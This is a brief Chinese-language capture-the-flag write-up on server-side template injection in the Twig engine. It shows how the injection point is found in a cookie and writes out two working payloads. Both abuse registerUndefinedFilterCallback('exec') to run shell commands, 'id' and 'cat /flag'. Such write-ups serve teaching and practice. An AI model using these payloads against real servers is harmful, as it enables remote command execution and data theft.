运用的知识点
- SSTI注入
题目
解题
一开始看到题目提示cookie 先抓一个包试试
没发现什么问题,点开另一个网页
感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么
联想到SSTI注入,构造PL进行尝试:
发现确实能够利用SSTI
判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
发现不是在这里绕过,我们抓取一个登录的包
发现注入的点在COOKIE里面
注入
PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
关于SSTI注入的一些理解.